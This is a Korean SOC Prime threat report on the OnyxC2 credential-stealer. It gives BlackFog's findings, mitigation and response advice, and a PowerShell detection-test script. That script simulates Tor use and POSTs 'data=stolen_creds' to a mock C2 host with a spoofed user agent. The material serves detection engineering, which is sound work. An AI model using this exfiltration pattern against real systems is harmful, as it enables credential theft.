SOC Prime Bias: 높음

16 Jun 2026 12:54 UTC

OnyxC2: 새로운 스틸러, 210개의 애플리케이션을 타겟으로

Author Photo
SOC Prime Team linkedin icon 팔로우
OnyxC2: 새로운 스틸러, 210개의 애플리케이션을 타겟으로
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

OnyxC2는 인증 정보, 이중 인증 확장 및 암호화폐 지갑을 약 210개 애플리케이션에서 탈취하도록 설계된 신흥 멀웨어 서비스형 정보 탈취 도구입니다. 이 플랫폼은 관리 패널, 빌더 및 원격 액세스 기능을 포함한 전체 상업형 툴킷을 제공합니다. 또한 크기 초과 서명된 바이너리 및 암호화된 페이로드 구성 요소와 같은 고급 회피 방법을 사용합니다.

조사

BlackFog 연구원들은 여러 OnyxC2 샘플을 조사하여 NVIDIA 그래픽 라이브러리로 위장한 120MB 이상의 악성 DLL과 함께 서명된 호스트 실행 파일을 악용하는 DLL 사이드 로딩 방식을 발견했습니다. 네트워크 분석 결과, 맬웨어가 특정 백엔드 API 끝점과 HTTPS를 통해 통신하는 것이 확인되었습니다. 연구원들은 또한 DLL 내에 내장된 암호화된 오버레이를 발견했으며, 이는 맬웨어가 간단한 정적 분석을 피할 수 있도록 도와줍니다.

완화

엔드포인트에 데이터 유출 방지 제어를 배치하면 어떤 프로세스를 사용하든지 관계없이 비인가 아웃바운드 트래픽을 차단하는 데 도움이 됩니다. 보안 팀은 서명된 바이너리와 관련된 의심스러운 DLL 로드를 모니터링하고 사용자 쓰기 가능한 경로에 나타나는 비정상적으로 큰 파일을 조사해야 합니다. 강력한 애플리케이션 제어 정책과 비인가된 예약 작업을 모니터링하는 것도 권장됩니다.

대응

OnyxC2 활동이 감지되면 추가 데이터 도난을 막기 위해 즉시 영향을 받은 시스템을 격리하십시오. 복호화된 페이로드를 복구하기 위해 전체 메모리 덤프를 캡처하고 활성 HVNC 세션이나 SOCKS5 프록시 활동이 있는지 확인하십시오. 최근에 생성된 모든 예약 작업을 검토하고 브라우저 인증서 저장소를 조사하여 손상 증거를 찾으십시오.

공격 흐름

시뮬레이션 실행

필수조건: 원격 측정 및 기준선 프리플라이트 검사를 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적군 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 내러티브는 식별된 TTP와 직접 일치해야 하며, 탐지 로직에서 예상되는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련 없는 예시를 사용하면 오진으로 이어질 수 있습니다.

  • 공격 내러티브 및 명령: 적군은 도난된 브라우저 인증 정보를 유출하려고 합니다. 네트워크 보안 모니터링에 의한 탐지를 피하기 위해 휴대용 Tor 바이너리를 배포하여 익명 터널을 만듭니다. 터널이 설정되면 맬웨어는 C2 서버에 연결을 시도합니다. 합법적인 웹 트래픽으로 위장하기 위해 맬웨어는 ‘Cloudflare’로 보이는 사용자 에이전트를 가장하고 Cloudflare 프록시 뒤에 호스팅된 특정 API 끝점을 목표로 설정합니다. 이 시퀀스는 탐지 규칙의 상관관계를 유발하기 위해 설계되었습니다. tor 명령 줄 인수와 특정 /backend/api/app.php URL 패턴.

  • 회귀 테스트 스크립트:

    # OnyxC2 스틸러 통신 시뮬레이션
    
    # 1. Tor 존재 시뮬레이션 (더미 파일/프로세스 동작 생성)
    # 실제 시나리오에서는 실제 tor.exe일 것입니다.
    $TorPath = "$env:TEMPtor.exe"
    "시뮬레이션된 Tor 바이너리 콘텐츠" | Out-File -FilePath $TorPath
    
    # 'tor'를 명령줄로 시작하는 프로세스 실행 이벤트 생성
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden
    
    # 탐지 논리 'command_line|contains: tor' 설정을 보장하기 위해,
    # 문자열 'tor'가 포함된 명령을 실행합니다.
    cmd.exe /c "echo initializing tor proxy..."
    
    # 2. C2 네트워크 연결 시뮬레이션
    # 특정 URL 및 사용자 에이전트를 사용하여 네트워크 연결을 시뮬레이션하기 위해 PowerShell을 사용합니다.
    $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php"
    $UserAgent = "Cloudflare-Proxy-Agent/1.0"
    
    Write-Host "Attempting C2 communication to $C2Url"
    Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue
  • 정리 명령:

    # 시뮬레이션된 아티팩트 제거
    Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "시뮬레이션 정리 완료."